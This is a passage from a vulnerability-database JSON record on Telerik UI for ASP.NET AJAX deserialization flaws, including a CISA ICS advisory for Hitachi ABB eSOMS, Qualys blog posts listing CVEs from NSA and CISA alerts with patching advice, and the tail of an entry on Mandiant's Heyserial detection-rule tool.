exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", "CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2022-04-26T21:45:47", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n * **ATTENTION: **Exploitable remotely/low skill level to exploit\n * **Vendor:** Hitachi ABB Power Grids\n * **Equipment: **eSOMS Telerik\n * **Vulnerabilities:** Path Traversal, Deserialization of Untrusted Data, Improper Input Validation, Inadequate Encryption Strength, Insufficiently Protected Credentials, Path Traversal\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could allow an attacker to upload malicious files to the server, discover sensitive information, or execute arbitrary code.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nHitachi ABB Power Grids reports the vulnerabilities affect the following eSOMS products: \n\n * eSOMS, all versions prior to 6.3 using a version of Telerik software \n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nPath traversal in RadChart in Telerik UI for ASP.NET AJAX allows a remote attacker to read and delete an image with extension .BMP, .EXIF, .GIF, .ICON, .JPEG, .PNG, .TIFF, or .WMF on the server through a specially crafted request. \n\n[CVE-2019-19790](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19790>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [DESERIALIZATION OF UNTRUSTED DATA CWE-502](<https://cwe.mitre.org/data/definitions/502.html>)\n\nProgress Telerik UI for ASP.NET AJAX through 2019.3.1023 contains a .NET deserialization vulnerability in the RadAsyncUpload function. This is exploitable when the encryption keys are known. \n\n[CVE-2019-18935](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-18935>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.3 [IMPROPER INPUT VALIDATION CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)\n\nProgress Telerik UI for ASP.NET AJAX before R2 2017 SP2 does not properly restrict user input to RadAsyncUpload, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11357](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11357>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.4 [INADEQUATE ENCRYPTION STRENGTH CWE-326](<https://cwe.mitre.org/data/definitions/326.html>)\n\nTelerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code. \n\n[CVE-2017-11317](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11317>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.5 [INSUFFICIENTLY PROTECTED CREDENTIALS CWE-522](<https://cwe.mitre.org/data/definitions/522.html>)\n\nTelerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise. \n\n[CVE-2017-9248](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-9248>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.6 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nAbsolute path traversal vulnerability in the RadAsyncUpload control in the RadControls in Telerik UI for ASP.NET AJAX before Q3 2012 SP2 allows remote attackers to write to arbitrary files, and consequently execute arbitrary code, via a full pathname in the UploadID metadata value. \n\n[CVE-2014-2217](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2217>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N>)).\n\n#### 3.2.7 [PATH TRAVERSAL CWE-22](<https://cwe.mitre.org/data/definitions/22.html>)\n\nCross-site scripting (XSS) vulnerability in Telerik UI for ASP.NET AJAX RadEditor control 2014.1.403.35, 2009.3.1208.20, and other versions allows remote attackers to inject arbitrary web script or HTML via CSS expressions in style attributes. \n\n[CVE-2014-4958](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4958>) has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi ABB Power Grids reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi ABB Power Grids has published an [advisory for eSOMS Telerik](<https://search.abb.com/library/Download.aspx?DocumentID=9AKK107991A8943&LanguageCode=en&DocumentPartId=&Action=Launch>) and advises users to update to eSOMS Version 6.3 as soon as possible. \n\nFor additional information and support, contact a product provider or Hitachi ABB Power Grids service organization. For contact information, visit [Hitachi ABB Power Grids contact-centers](<https://www.hitachiabb-powergrids.com/contact-us/>).\n\nRecommended security practices and firewall configurations can help protect a process control network from attacks that originate from outside the network. Such practices include ensuring applications and servers are physically protected from direct access by unauthorized personnel, have no direct connections to the Internet, are separated from other networks by means of a firewall system that has a minimal number of ports exposed, and others that must be evaluated case by case. Sensitive application servers should not be used for Internet surfing, instant messaging, or receiving e-mails. Portable computers and removable storage media should be carefully scanned for viruses before they are connected to a control system.\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/recommended-practices>) on the ICS webpage on [us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>). Several recommended practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the [ICS webpage on us-cert.cisa.gov](<https://us-cert.cisa.gov/ics>) in the Technical Information Paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://us-cert.cisa.gov/ics/tips/ICS-TIP-12-146-01B>). \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.\n\nNo known public exploits specifically target these vulnerabilities.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ics/advisories/icsa-21-077-03>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T00:00:00", "type": "ics", "title": "Hitachi ABB Power Grids eSOMS Telerik", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2217", "CVE-2014-4958", "CVE-2017-11317", "CVE-2017-11357", "CVE-2017-9248", "CVE-2019-18935", "CVE-2019-19790"], "modified": "2021-03-18T00:00:00", "id": "ICSA-21-077-03", "href": "https://www.us-cert.gov/ics/advisories/icsa-21-077-03", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "qualysblog": [{"lastseen": "2020-10-23T16:02:16", "description": "On October 20, 2020, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.\n\n"Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and \nmitigation efforts," said the NSA advisory. It also recommended "critical system owners consider these actions a priority, in order to mitigate the loss of sensitive information that could impact U.S. policies, strategies, plans, and competitive advantage."\n\nEarlier this year, the NSA also announced Sandworm actors exploiting the [Exim MTA Vulnerability](<https://blog.qualys.com/product-tech/2020/05/29/nsa-announces-sandworm-actors-exploiting-exim-mta-vulnerability-cve-2019-10149>). Similar alerts have been published by the Cybersecurity and Infrastructure Security Agency (CISA) over the last year. CISA also issued an [advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>) notifying about vulnerabilities that were exploited in the wild to retrieve sensitive data such as intellectual property, economic, political, and military information. \n\nHere is a list of 25 publicly known vulnerabilities (CVEs) published by the NSA, along affected products and associated Qualys VMDR QID(s) for each vulnerability:\n\n**CVE-ID(s)**| **Affected products**| **Qualys QID(s)** \n---|---|--- \nCVE-2020-5902| Big-IP devices| 38791, 373106 \nCVE-2019-19781| Citrix Application Delivery Controller \nCitrix Gateway \nCitrix SDWAN WANOP| 150273, 372305, 372685 \nCVE-2019-11510| Pulse Connect Secure| 38771 \nCVE-2020-8193 \nCVE-2020-8195 \nCVE-2020-8196| Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 \nCitrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7| 13833, 373116 \nCVE-2019-0708| Microsoft Windows multiple products| 91541, 91534 \nCVE-2020-15505| MobileIron Core & Connector| 13998 \nCVE-2020-1350| Microsoft Windows multiple products| 91662 \nCVE-2020-1472| Microsoft Windows multiple products| 91688 \nCVE-2019-1040| Microsoft Windows multiple products| 91653 \nCVE-2018-6789| Exim before 4.90.1| 50089 \nCVE-2020-0688| Multiple Microsoft Exchange Server| 50098 \nCVE-2018-4939| Adobe ColdFusion| 370874 \nCVE-2015-4852| Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0| 86362, 86340 \nCVE-2020-2555| Oracle Coherence product of Oracle Fusion Middleware Middleware; versions 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.| 372345 \nCVE-2019-3396| Atlassian Confluence Server before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3), and from version 6.14.0 before 6.14.2| 13459 \nCVE-2019-11580| Atlassian Crowd and Crowd Data Center| 13525 \nCVE-2020-10189| Zoho ManageEngine Desktop Central before 10.0.474| 372442 \nCVE-2019-18935| Progress Telerik UI for ASP.NET AJAX through 2019.3.1023| 372327, 150299 \nCVE-2020-0601| Microsoft Windows multiple products| 91595 \nCVE-2019-0803| Microsoft Windows multiple products| 91522 \nCVE-2017-6327| Symantec Messaging Gateway before 10.6.3-267| 11856 \nCVE-2020-3118| Cisco IOS XR, NCS| 316792 \nCVE-2020-8515| DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices| 13730 \n \n## Detect 25 Publicly Known Vulnerabilities using VMDR\n\nQualys released several remote and authenticated QIDs for commonly exploited vulnerabilities. You can search for these QIDs in VMDR Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds: [CVE-2019-11510,CVE-2020-5902,CVE-2019-19781,CVE-2020-8193,CVE-2020-8195,CVE-2020-8196,CVE-2019-0708,CVE-2020-15505,CVE-2020-1472,CVE-2019-1040,CVE-2020-1350,CVE-2018-6789,CVE-2018-4939,CVE-2020-0688,CVE-2015-4852,CVE-2020-2555,CVE-2019-3396,CVE-2019-11580,CVE-2020-10189,CVE-2019-18935,CVE-2020-0601,CVE-2019-0803,CVE-2017-6327,CVE-2020-3118,CVE-2020-8515]_\n\n * \n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for "Active Attack" RTI:\n\n\n\n### Identify Vulnerable Assets using Qualys Threat Protection\n\nIn addition, Qualys customers can locate vulnerable host through [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) by simply clicking on the impacted hosts. This helps in effectively identifying and tracking this vulnerability.\n\n\n\nWith VMDR Dashboard, you can track 25 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the ["NSA's Top 25 Vulnerabilities from China" dashboard](<https://qualys-secure.force.com/customer/s/article/000006429>).\n\n\n\n### **Recommendations**\n\nAs guided by CISA, to protect assets from exploiting, one must do the following:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Vigilance team of an organization should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n\n#### **Remediation and Mitigation**\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching the high-priority commonly exploited vulnerabilities.\n\n### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "cvss3": {}, "published": "2020-10-22T23:10:29", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-10149", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T20:34:35", "description": "On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [cybersecurity advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>) detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.\n\nThe advisory states, \u201cIf an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest number of potential attackers (such as internet-facing systems).\u201d\n\nCISA released the advisory in conjunction with the Australian Cyber Security Centre (ACSC), the United Kingdom\u2019s National Cyber Security Centre (NCSC), and the U.S. Federal Bureau of Investigation (FBI).\n\nThe CISA advisory is similar in scope to the October 2020 United States National Security Agency (NSA) [cybersecurity advisory](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) listing the top 25 known vulnerabilities being actively used by Chinese state-sponsored cyber actors [that security teams can detect and mitigate or remediate](<https://blog.qualys.com/product-tech/2020/10/22/nsa-alert-chinese-state-sponsored-actors-exploit-known-vulnerabilities>) in their infrastructure using Qualys VMDR.\n\n### Top Routinely Exploited Vulnerabilities\n\nHere is the list of top routinely exploited vulnerabilities in 2020 and 2021 along with affected products and associated Qualys VMDR QID(s) for each vulnerability.\n\n**CVE-IDs**| **Affected Products**| **Qualys Detections (QIDs)** \n---|---|--- \nCVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065| Microsoft Exchange| 50107, 50108 \nCVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900| Pulse Secure| 38838 \nCVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104| Accellion| 38830 \nCVE-2021-21985| VMware| 730102, 216261, 216260, 216259 \nCVE-2018-13379, CVE-2020-12812, CVE-2019-5591| Fortinet| 43702, 43769, 43825 \nCVE-2019-19781| Citrix| 150273, 372305, 372685 \nCVE-2019-11510| Pulse| 38771 \nCVE-2018-13379| Fortinet| 43702 \nCVE-2020-5902| F5- Big IP| 38791, 373106 \nCVE-2020-15505| MobileIron| 13998 \nCVE-2017-11882| Microsoft| 110308 \nCVE-2019-11580| Atlassian| 13525 \nCVE-2018-7600| Drupal| 371954, 150218, 277288, 176337, 11942 \nCVE-2019-18935| Telerik| 150299, 372327 \nCVE-2019-0604| Microsoft| 110330 \nCVE-2020-0787| Microsoft| 91609 \nCVE-2020-1472| Netlogon| 91688 \n \n### Detect CISA\u2019s Top Routinely Exploited Vulnerabilities using Qualys VMDR\n\nQualys released several remote and authenticated detections (QIDs) for the vulnerabilities. You can search for these QIDs in VMDR Dashboard using the following QQL query:\n\n__vulnerabilities.vulnerability.cveIds: [_`_CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27065`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-21985`,` CVE-2018-13379`,`CVE-2020-12812`,`CVE-2019-5591`,`CVE-2019-19781`,`CVE-2019-11510`,`CVE-2018-13379`,`CVE-2020-5902`,`CVE-2020-15505`,`CVE-2017-11882`,`CVE-2019-11580`,`CVE-2019-18935`,`CVE-2019-0604`,`CVE-2020-0787`,`CVE-2020-1472`]__\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), customers can effectively prioritize this vulnerability for \u201cActive Attack\u201d RTI:\n\n\n\nWith VMDR Dashboard, you can track top 30 publicly known exploited vulnerabilities, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the [\u201cCISA: Alert (AA21-209A) | Top Exploited\u201d dashboard](<https://success.qualys.com/support/s/article/000006738>).\n\n\n\n### Recommendations\n\nAs guided by CISA, one must do the following to protect assets from being exploited:\n\n * Minimize gaps in personnel availability and consistently consume relevant threat intelligence.\n * Organizations\u2019 vigilance team should keep a close eye on indications of compromise (IOCs) as well as strict reporting processes.\n * Regular incident response exercises at the organizational level are always recommended as a proactive approach.\n * Organizations should require multi-factor authentication to remotely access networks from external sources, especially for administrator or privileged accounts.\n * Focus cyber defense resources on patching those vulnerabilities that cyber actors most often use.\n\n### Remediation and Mitigation\n\n * Patch systems and equipment promptly and diligently.\n * Implement rigorous configuration management programs.\n * Disable unnecessary ports, protocols, and services.\n * Enhance monitoring of network and email traffic.\n * Use protection capabilities to stop malicious activity.\n\n### Get Started Now\n\nStart your [_Qualys VMDR trial_](<https://www.qualys.com/subscriptions/vmdr/>) to automatically detect and mitigate or remediate the CISA top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-29T00:20:27", "type": "qualysblog", "title": "CISA Alert: Top Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-5591", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
Exploit for Deserialization of Untrusted Data in Telerik Ui For Asp.Net Ajax
